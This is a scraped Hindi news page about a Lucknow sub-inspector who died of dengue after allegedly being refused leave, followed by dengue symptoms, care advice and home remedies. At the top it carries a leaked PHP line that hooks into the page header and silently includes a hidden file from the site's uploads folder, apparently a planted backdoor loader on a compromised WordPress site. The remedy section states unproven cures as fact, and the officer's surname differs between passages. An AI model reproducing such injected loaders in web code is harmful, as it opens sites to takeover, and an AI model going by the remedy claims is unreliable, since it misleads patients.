add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); डेंगू से SI की मौत, आरोप- SSP ने नहीं दी छुट्टी, इसी महीने वो बनने वाला था पिता – SOCH INDIA
Menu

अपराध समाचार
डेंगू से SI की मौत, आरोप- SSP ने नहीं दी छुट्टी, इसी महीने वो बनने वाला था पिता

nobanner
डेंगू से SI की मौत, आरोप- SSP ने नहीं दी छुट्टी, इसी महीने वो बनने वाला था पिता
लखनऊ. डेंगू और पीलिया रोग से ग्रस्‍त एक दारोगा की शनिवार सुबह इलाज के दौरान मौत हो गई। उनके परिवार में पत्‍नी के अलावा एक ढाई साल की दुधमुंही बच्‍ची है। इसी महीने वह दूसरे बच्‍चे का पिता भी बनने वाला था। मृतक के परिजनों का आरोप है कि बीमारी की वजह से उन्‍होंने छुट्टी मांगी थी, लेकिन छुट्टी नहीं दी गई। वहीं, रात में पुलिस के आलाधिकारियों ने 2 घंटे की ड्यूटी करने के आदेश दिए थे, लेकिन एसएसपी ने 4 घंटे की ड्यूटी कर दी थी। आगे पढ़िए क्‍या कहती हैं एसएसपी मंजिल सैनी…
-मृतक दारोगा कृष्‍ण गोपाल शर्मा (30) गाजीपुर थानाक्षेत्र के भूतनाथ चौकी के इंचार्ज थे।
-वह कई दिनों से बीमार चल रहे थे।
-पिछले दिनों बीमारी के चलते दारोगा को शेखर अस्पताल में भर्ती कराया गया था।
-हालत बिगड़ने पर उन्हें पीजीआई में भर्ती कराया गया, जहां इलाज के दौरान उन्‍होंने दम तोड़ दिया।
-मौत की खबर मिलते ही दारोगा के घर में कोहराम मच गया।
एसएसपी मंजिल सैनी ने कहा
-एसएसपी मंजिल सैनी ने बताया कि दारोगा कृष्‍ण गोपाल शुक्‍ला 7 जुलाई से पीलिया और डेंगू से पीड़ित थे।
-उन्‍हें गाजीपुर में एक निजी अस्‍पताल में भर्ती कराया गया था।
-हालत बिगड़ने पर पीजीआई के आईसीयू में सीसीयू में भर्ती कराया गया।
-जहां इलाज के दौरान शनिवार सुबह उनकी मौत हो गई।
-वहीं, इस घटना को संज्ञान में लेते हुए डीएम राजशेखर ने एसएसपी मंजिल सैनी से इस पूरे मामले की रिपोर्ट मांगी है।
-साथ ही उन्‍होंने कहा है कि रिपोर्ट मिलने के बाद सीएम रिलीफ फंड से सहायता दिलाने की कोशिश करेंगे।
ये हैं डेंगू के लक्षण
-सीएमओ डॉ. एसएनएस यादव ने बताया कि डेंगू संक्रमित मरीजों में बुखार के साथ सिरदर्द, बदन दर्द, कमर दर्द और त्वचा पर चकत्ते आदि के लक्षण पाए जाते हैं।
-यदि‍ तेज सिर दर्द के साथ बुखार हो, मांसपेशियों और जोड़ों में दर्द हो, आंख के पीछे दर्द हो, जी मिचलाना और उल्टी की शि‍कायत हो सकती है।
-गंभीर मामलों में नाक, मुंह और मसूढ़ों से खून के भी आने की संभावना हो सकती है।
इलाज और सावधानियां
-डेंगू के इलाज के लिए कोई खास दवा नहीं होती है।
-बुखार उतारने के लिए पैरासिटामोल का प्रयोग करें।
-किसी किस्म की दर्द निवारक दवा आदि का प्रयोग न करें।
-डेंगू का टेस्ट सरकारी अस्पतालों में नि:शुल्क होता है।
-घर और आसपास पानी न जमा होने दें।
घर पर ऐसे कर सकते हैं इलाज
-क्षेत्रीय आयुर्वेद अधि‍कारी डॉ. शि‍वशंकर त्रि‍पाठी के मुताबि‍क, पपीते के पत्तों का रस नि‍काल कर मरीज़ को दिन में दो से तीन बार दें।
-एक दिन की खुराक के बाद ही प्लेटलेट की संख्या बढ़ने लगेगी।
-गिलोय की बेल का सत्व मरीज़ को दिन में दो तीन बार दें, इससे खून में प्लेटलेट की संख्या बढ़ती है।
-रोग से लड़ने की शक्ति बढ़ती है और कई रोगों का नाश होता है।
-यदि रोगी बार-बार उलटी करे तो सेब के रस में थोड़ा निम्बू मिलाकर रोगी को दें, उल्टियाँ बंद हो जाएंगी।
-नीम और तुलसी का काढ़ा 20 से 50 मिलीलीटर पीने से डेंगू में लाभ होता है।
-करेले के रस में जीरा डालकर पीने से डेंगू में लाभ होता है।
-रात में पुराने गुड़ के साथ जीरा खाने से डेंगू में लाभ होता है।
 
503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.